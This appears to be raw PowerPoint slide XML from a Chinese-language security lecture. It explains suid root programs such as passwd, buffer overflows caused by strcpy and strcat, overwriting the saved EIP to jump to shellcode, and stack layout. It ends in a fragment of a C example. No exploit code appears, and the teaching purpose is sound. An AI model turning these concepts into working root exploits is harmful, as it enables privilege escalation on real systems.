                                        <p:tgtEl>
                                          <p:spTgt spid="258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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258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32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258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8051">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258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05CF38FC-C99E-47BF-89B6-F7E2FFFBCC99}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="152400"/>
            <a:ext cx="6870700" cy="1008063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900113" y="1412875"/>
            <a:ext cx="7772400" cy="4962525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>授予用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>特权</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>赋予程序一种能力，使得程序象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>用户的程序一样运行。正确的执行系统功能，而又不真正授予用户整个系统的控制权。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>这种类型的权限称作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>任何用户在执行拥有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>权限的程序时，用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>被改成程序所有者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，程序被执行。执行完成后，用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>恢复为原来的值。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2786912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6F8D61DE-394D-4656-88EF-1E1E0C7E0CC8}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如果用户想修改自己的密码，他可以运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/usr/bin/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，这是属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的，且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>位打开。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>权限打开并且属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>用户的程序称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>suid root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>程序</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如果程序的流程可以改变执行一段注入的随意代码，则攻击者可以象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>用户一样使程序作任何事</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="557566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5D3E484-CDEE-4AA1-88D7-9A82AFEFF62B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓冲区溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="1844675"/>
            <a:ext cx="7772400" cy="4891088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>语言是假定程序员负责数据的安全性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如果程序员不小心，会导致程序缓冲区溢出和存储器泄露的漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>这意味着一旦给某个变量分配了存储空间，则没有内置的安全机制来确保这个变量的容量能够适应已分配的空间。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>即使将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>个字节的数据存入只分配了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>个字节的缓冲区内</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280865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CF3E44A5-7B36-4871-984A-EA7169F01AC8}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓冲区溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓冲区溢出攻击，是通过重写堆栈中储存的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址的内容，以使程序跳转到指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>处执行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主要是由一些不好的编程习惯，比如使用不安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2150502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A01E11BF-3A1A-4AD3-A24C-D8513C3F2996}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>堆栈的作用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="2060575"/>
            <a:ext cx="7772400" cy="3883025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>堆栈在子程序调用的时候用来传递参数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>堆栈用来保存子程序的返回地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>堆栈用来保存子程序中的变量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2407362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0B6868DD-3BDF-41AD-99DE-12B357CF6AF3}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
              <a:pPr algn="l">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="2565400"/>
            <a:ext cx="1439862"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5365" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="3141663"/>
            <a:ext cx="14398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15366" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="3716338"/>
            <a:ext cx="14398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zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="272777"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>子程序变量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15367" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="4292600"/>
            <a:ext cx="1439862"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zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="272777"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15368" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="4868863"/>
            <a:ext cx="14398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zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="272777"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15369" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4284663" y="1916113"/>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accent1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="272777"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>堆栈</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4247530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sz="3600" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>语言函数调用例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321539" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="964326" y="1516840"/>
            <a:ext cx="6350874" cy="4604041"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>void function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> b, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> c) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  char buffer1[5];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  char buffer2[10];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
